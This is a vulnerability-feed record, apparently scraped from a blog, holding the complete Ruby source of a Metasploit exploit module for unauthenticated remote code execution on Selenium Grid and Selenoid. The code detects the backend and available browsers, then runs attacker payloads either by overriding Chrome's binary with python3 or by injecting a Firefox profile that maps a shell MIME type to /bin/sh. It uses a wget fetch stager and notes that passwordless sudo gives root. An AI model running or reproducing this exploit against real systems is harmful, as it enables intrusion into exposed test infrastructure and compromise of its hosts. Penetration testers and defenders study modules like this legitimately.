{“lastseen”:”2026-04-14T19:28:03″,”description”:”Selenium Grid and Selenoid expose a WebDriver API that allows creating browser sessions with arbitrary capabilities. When deployed without authentication the default for both, an attacker can achieve remote code execution through two browser-specific…”,”published”:”2026-04-14T19:00:11″,”modified”:”2026-04-14T19:00:11″,”type”:”metasploit”,”title”:”Selenium Grid\/Selenoid Unauthenticated RCE”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-LINUX-HTTP-SELENIUM_GREED_RCE-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank = ExcellentRanking\\n\\n include Msf::Module::Deprecated\\n moved_from ‘exploit\/linux\/http\/selenium_greed_chrome_rce_cve_2022_28108’\\n moved_from ‘exploit\/linux\/http\/selenium_greed_firefox_rce_cve_2022_28108’\\n\\n include Msf::Exploit::Remote::HttpClient\\n include Msf::Exploit::FileDropper\\n include Msf::Payload::Python\\n prepend Msf::Exploit::Remote::AutoCheck\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Selenium Grid\/Selenoid Unauthenticated RCE’,\\n ‘Description’ =\\u003e %q{\\n Selenium Grid and Selenoid expose a WebDriver API that allows creating\\n browser sessions with arbitrary capabilities. When deployed without\\n authentication (the default for both), an attacker can achieve remote\\n code execution through two browser-specific techniques:\\n\\n For Chrome, the goog:chromeOptions binary field can be set to an\\n arbitrary executable such as \/usr\/bin\/python3, since ChromeDriver does\\n not validate it. This was fixed in Selenium Grid 4.11.0 via the\\n stereotype capabilities merge. All Selenoid versions remain vulnerable.\\n\\n For Firefox, a custom profile containing a malicious MIME handler that\\n maps application\/sh to \/bin\/sh can be injected via moz:firefoxOptions.\\n Navigating to a data: URI with that content type triggers shell\\n execution. This technique has never been patched and works on all\\n Selenium Grid versions including the latest release.\\n\\n The module auto-detects available browsers and selects the best attack\\n vector. Firefox is preferred as it works on all Grid versions.\\n\\n The default Docker images run as seluser\/selenium with passwordless\\n sudo, allowing trivial privilege escalation to root.\\n },\\n ‘Author’ =\\u003e [\\n ‘Jon Stratton’,\\n ‘Wiz Research’,\\n ‘Takahiro Yokoyama’,\\n ‘Valentin Lobstein \\u003cchocapikk[at]leakix.net\\u003e’\\n ],\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘References’ =\\u003e [\\n [‘URL’, ‘https:\/\/www.wiz.io\/blog\/seleniumgreed-cryptomining-exploit-attack-flow-remediation-steps’],\\n [‘URL’, ‘https:\/\/www.selenium.dev\/blog\/2024\/protecting-unsecured-selenium-grid\/’],\\n [‘URL’, ‘https:\/\/github.com\/SeleniumHQ\/selenium\/issues\/9526’],\\n [‘URL’, ‘https:\/\/github.com\/JonStratton\/selenium-node-takeover-kit\/tree\/master’],\\n [‘EDB’, ‘49915’],\\n [‘CWE’, ‘306’]\\n ],\\n ‘Platform’ =\\u003e %w[python unix linux],\\n ‘Arch’ =\\u003e [ARCH_PYTHON, ARCH_CMD],\\n ‘Payload’ =\\u003e {},\\n ‘Targets’ =\\u003e [\\n [\\n ‘Python In-Memory’,\\n {\\n ‘Platform’ =\\u003e ‘python’,\\n ‘Arch’ =\\u003e ARCH_PYTHON\\n }\\n ],\\n [\\n ‘Unix\/Linux Command Shell’,\\n {\\n ‘Platform’ =\\u003e %w[unix linux],\\n ‘Arch’ =\\u003e ARCH_CMD,\\n ‘DefaultOptions’ =\\u003e {\\n ‘FETCH_COMMAND’ =\\u003e ‘WGET’,\\n ‘FETCH_DELETE’ =\\u003e true,\\n ‘FETCH_WRITABLE_DIR’ =\\u003e ‘\/tmp’\\n }\\n }\\n ]\\n ],\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘DisclosureDate’ =\\u003e ‘2021-05-28’,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘SideEffects’ =\\u003e [ARTIFACTS_ON_DISK, IOC_IN_LOGS],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION]\\n }\\n )\\n )\\n\\n register_options([\\n Opt::RPORT(4444),\\n OptString.new(‘TARGETURI’, [true, ‘Base path to Selenium Grid or Selenoid’, ‘\/’]),\\n OptEnum.new(‘BROWSER’, [true, ‘Browser to exploit (auto detects and picks best vector)’, ‘auto’, %w[auto firefox chrome]])\\n ])\\n end\\n\\n def check\\n @backend = detect_backend\\n return CheckCode::Unknown(‘No response from target’) unless @backend\\n\\n @browsers = enumerate_browsers\\n return CheckCode::Appears(\\”#{@backend[:message]} (all versions vulnerable)\\”) if selenoid?\\n\\n check_grid\\n end\\n\\n def exploit\\n @backend ||= detect_backend\\n @browsers ||= enumerate_browsers\\n browser = select_browser\\n fail_with(Failure::NoTarget, ‘No exploitable browser found on target’) unless browser\\n\\n send(\\”exploit_#{browser}\\”)\\n end\\n\\n private\\n\\n def selenoid?\\n @backend\\u0026.dig(:type) == :selenoid\\n end\\n\\n def session_path\\n normalize_uri(target_uri.path, selenoid? ? ‘wd\/hub\/session’ : ‘session’)\\n end\\n\\n def grid_version\\n nodes = @backend\\u0026.dig(:value, ‘nodes’)\\n return unless nodes.is_a?(Array) \\u0026\\u0026 !nodes.empty?\\n\\n version_raw = nodes.first[‘version’]\\n return unless version_raw\\n\\n version_raw.split(\/\\\\s\/).first\\n end\\n\\n def chrome_vuln?\\n return true if selenoid?\\n\\n ver = grid_version\\n ver \\u0026\\u0026 Rex::Version.new(ver) \\u003c Rex::Version.new(‘4.11.0’) \\u0026\\u0026 @browsers.include?(‘chrome’)\\n end\\n\\n def detect_backend\\n %w[status wd\/hub\/status].each do |path|\\n res = send_request_cgi(‘method’ =\\u003e ‘GET’, ‘uri’ =\\u003e normalize_uri(target_uri.path, path))\\n next unless res\\u0026.code == 200\\n\\n value = res.get_json_document[‘value’]\\n next unless value.is_a?(Hash) \\u0026\\u0026 value[‘message’].is_a?(String)\\n\\n msg = value[‘message’].downcase\\n return { type: :selenoid, message: value[‘message’], value: value } if msg.include?(‘selenoid’)\\n return { type: :grid, message: value[‘message’], value: value } if msg.include?(‘selenium grid’)\\n end\\n nil\\n end\\n\\n def enumerate_browsers\\n return [] unless @backend\\n return selenoid_browsers if selenoid?\\n\\n grid_browsers\\n end\\n\\n def selenoid_browsers\\n browsers = @backend[:value][‘browsers’]\\n return %w[chrome firefox] unless browsers.is_a?(Hash)\\n\\n browsers.keys.map(\\u0026:downcase)\\n end\\n\\n def grid_browsers\\n nodes = @backend[:value][‘nodes’]\\n return [] unless nodes.is_a?(Array)\\n\\n nodes.flat_map { |n| (n[‘slots’] || []).map { |s| s.dig(‘stereotype’, ‘browserName’)\\u0026.downcase } }.compact.uniq\\n end\\n\\n def check_grid\\n ver_str = grid_version\\n return CheckCode::Detected(‘Selenium Grid detected but could not determine version’) unless ver_str\\n return CheckCode::Appears(\\”Selenium Grid #{ver_str} with Firefox (all versions vulnerable to profile handler)\\”) if @browsers.include?(‘firefox’)\\n return CheckCode::Appears(\\”Selenium Grid #{ver_str} with Chrome (vulnerable to binary override)\\”) if chrome_vuln?\\n return CheckCode::Safe(\\”Selenium Grid #{ver_str} – Chrome patched (stereotype merge), no Firefox available\\”) if @browsers.include?(‘chrome’)\\n\\n CheckCode::Detected(\\”Selenium Grid #{ver_str} – no exploitable browsers found\\”)\\n end\\n\\n def select_browser\\n choice = datastore[‘BROWSER’]\\n\\n if choice != ‘auto’\\n print_warning(\\”#{choice} not available on target (found: #{@browsers.join(‘, ‘)})\\”) unless @browsers.empty? || @browsers.include?(choice)\\n return choice\\n end\\n\\n if @browsers.include?(‘firefox’)\\n print_status(‘Auto-selected Firefox (profile handler – works on all Grid versions)’)\\n return ‘firefox’\\n end\\n\\n if @browsers.include?(‘chrome’) \\u0026\\u0026 chrome_vuln?\\n print_status(‘Auto-selected Chrome (binary override)’)\\n return ‘chrome’\\n end\\n\\n print_warning(\\”Chrome binary override patched on Grid #{grid_version}, no Firefox available\\”) if @browsers.include?(‘chrome’)\\n nil\\n end\\n\\n def create_session(body)\\n send_request_cgi(‘method’ =\\u003e ‘POST’, ‘uri’ =\\u003e session_path, ‘ctype’ =\\u003e ‘application\/json’, ‘data’ =\\u003e body)\\n end\\n\\n def cleanup_session(session_id)\\n res = send_request_cgi(‘method’ =\\u003e ‘DELETE’, ‘uri’ =\\u003e normalize_uri(session_path, session_id), ‘ctype’ =\\u003e ‘application\/json’)\\n print_status(res ? \\”Deleted session #{session_id}\\” : \\”Could not delete session #{session_id}. It may need to expire.\\”)\\n rescue StandardError\\n nil\\n end\\n\\n def exploit_chrome\\n body = {\\n ‘capabilities’ =\\u003e {\\n ‘alwaysMatch’ =\\u003e {\\n ‘browserName’ =\\u003e ‘chrome’,\\n ‘goog:chromeOptions’ =\\u003e { ‘binary’ =\\u003e ‘\/usr\/bin\/python3’, ‘args’ =\\u003e [\\”-c#{build_python_payload}\\”] }\\n }\\n }\\n }.to_json\\n\\n print_status(‘Sending Chrome session request with binary override…’)\\n res = create_session(body)\\n\\n return print_warning(‘No response received (expected – Python exits after execution)’) unless res\\n return print_good(‘Payload executed (server returned 500 as expected)’) if res.code == 500\\n\\n fail_with(Failure::UnexpectedReply, \\”Unexpected HTTP #{res.code}\\”) unless res.code == 200\\n\\n json = res.get_json_document\\n return print_good(\\”Payload executed (Chrome crash expected: #{json[‘value’][‘message’]\\u0026.slice(0, 80)}…)\\”) if json.dig(‘value’, ‘error’)\\n\\n session_id = json.dig(‘value’, ‘sessionId’)\\n return unless session_id\\n\\n print_warning(\\”Session #{session_id} created but binary override may have been ignored\\”)\\n cleanup_session(session_id)\\n end\\n\\n def build_python_payload\\n inner = target[‘Arch’] == ARCH_PYTHON ? payload.encoded : \\”os.system(#{payload.encoded.inspect})\\”\\n py_create_exec_stub(\\”import os,time\\\\npid=os.fork()\\\\nif pid==0:\\\\n os.setsid()\\\\n #{inner}\\\\nelse:\\\\n time.sleep(300)\\”)\\n end\\n\\n def exploit_firefox\\n encoded_profile = build_malicious_profile\\n body = {\\n ‘desiredCapabilities’ =\\u003e { ‘browserName’ =\\u003e ‘firefox’, ‘firefox_profile’ =\\u003e encoded_profile },\\n ‘capabilities’ =\\u003e { ‘firstMatch’ =\\u003e [{ ‘browserName’ =\\u003e ‘firefox’, ‘moz:firefoxOptions’ =\\u003e { ‘profile’ =\\u003e encoded_profile } }] }\\n }.to_json\\n\\n print_status(‘Creating Firefox session with malicious profile…’)\\n res = create_session(body)\\n fail_with(Failure::UnexpectedReply, ‘No response when creating session’) unless res\\n\\n session_id = res.get_json_document.dig(‘value’, ‘sessionId’) || res.get_json_document[‘sessionId’]\\n fail_with(Failure::UnexpectedReply, ‘Failed to create Firefox session’) unless session_id\\n print_status(\\”Session created: #{session_id}\\”)\\n\\n cmd = payload.encoded\\n cmd = \\”echo -n #{Rex::Text.encode_base64(cmd)} | base64 -d | python3 \\u0026\\” if target[‘Arch’] == ARCH_PYTHON\\n script = \\”#{cmd}\\\\n\\”\\n\\n fetch_dir = datastore[‘FETCH_WRITABLE_DIR’] || ‘\/tmp’\\n fetch_file = datastore[‘FETCH_FILENAME’]\\n register_file_for_cleanup(\\”#{fetch_dir}\/#{fetch_file}\\”) if fetch_file\\n\\n print_status(‘Navigating to data: URI to trigger handler…’)\\n send_request_cgi(\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, selenoid? ? ‘wd\/hub’ : ”, \\”session\/#{session_id}\/url\\”),\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘data’ =\\u003e { ‘url’ =\\u003e \\”data:application\/sh;charset=utf-16le;base64,#{Rex::Text.encode_base64(script)}\\” }.to_json\\n )\\n\\n cleanup_session(session_id)\\n end\\n\\n def build_malicious_profile\\n stringio = Zip::OutputStream.write_buffer do |io|\\n io.put_next_entry(‘handlers.json’)\\n io.write({\\n ‘defaultHandlersVersion’ =\\u003e { ‘en-US’ =\\u003e 4 },\\n ‘mimeTypes’ =\\u003e { ‘application\/sh’ =\\u003e { ‘action’ =\\u003e 2, ‘handlers’ =\\u003e [{ ‘name’ =\\u003e ‘sh’, ‘path’ =\\u003e ‘\/bin\/sh’ }] } }\\n }.to_json)\\n end\\n stringio.rewind\\n Base64.strict_encode64(stringio.sysread)\\n end\\n\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/linux\/http\/selenium_greed_rce.rb”,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/exploit\/linux\/http\/selenium_greed_rce\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-04-14T19:28:03″,”description”:”Selenium Grid and Selenoid expose a WebDriver API that allows creating browser sessions with arbitrary capabilities. When deployed without authentication the default for both, an…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,169,13,33,7,11,5],"class_list":["post-46986","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-metasploit","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n